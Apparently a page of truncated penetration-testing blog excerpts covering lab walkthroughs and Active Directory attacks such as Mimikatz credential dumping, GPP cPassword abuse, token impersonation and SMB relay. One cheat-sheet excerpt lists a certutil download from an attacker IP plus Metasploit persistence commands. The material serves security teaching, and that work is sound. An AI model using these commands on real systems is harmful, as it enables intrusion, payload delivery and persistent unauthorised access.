This is a very easy machine, in which we have to get into the machine through SSH and then we have to escalate our privileges to get the root flag. So Our Very First step is to run the Nmap scan. Command: nmap -T5 -p- -A <target IP> Now in…

INTRODUCTION: So this Room called Steel Mountain is based on a series named as Mr. Robot, The very First question in this Introduction part is: What is the name of Employee of the month? If we go to the page and click to download the image then we can see the…

File Transfer Certutil certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP python -m SimpleHTTPServer 80 Browser Navigate directly to file FTP python -m pyftpdlib 21 (attacker machine) ftp 10.10.10.10 (Attacker IP) Linux wget Maintaining Access Persistence Scripts run persistence -h exploit/windows/local/persistence exploit/windows/local/registry_persistence Schedule Tasks run scheduleme

OVERVIEW What is Mimikatz? Tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks Dumps credentials stored in memory. Just a few attacks: Credentials Dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket. CREDENTIAL DUMPING We will use the tool named as Mimikatz to dump credentials from a computer. We are assuming that a…

Overview Group Policy Preferences allowed admins to create policies using embedded credentials. These credentials were encrypted and placed in a “cPassword” The key was accidentally released(whoops) Patched in MS14–025, but doesn’t prevent previous uses Group Policy Pwnage: https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ ABUSING GPP We will solve a machine which is available on hack the box. …

Overview What are tokens? Temporary keys that allow you access to a system/network without having provide credentials each time you access a file. Think cookies for computers. Two types: Delegate- Created for logging into a machine or using Remote Desktop. Impersonate- “non-interactive” such as attaching a network drive or a domain logon script. Steps: Pop a shell…

Bloodhound Overview Bloodhound is a tool which is used to download the data essentially of Active directory and it will visualize the data in a graph. So that we are going to be able to identify a lot of information about a network very quickly. Command to install Bloodhound: sudo apt install…

Overview If both the IPv4 and IPv6 is turned on and if you are utilizing IPv4 then who’s doing DNS for IPv6, the simple answer is usually nobody. Now we will setup an attacker machine that will listen to IPv6 and represent itself as a DNS for it. When we reboot…

What is SMB Relay? Instead of cracking the hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access. Requirements: SMB signing must be disabled on the target. Relayed user credentials must be admin on machine. SMB signing will check that the packets are coming from right place…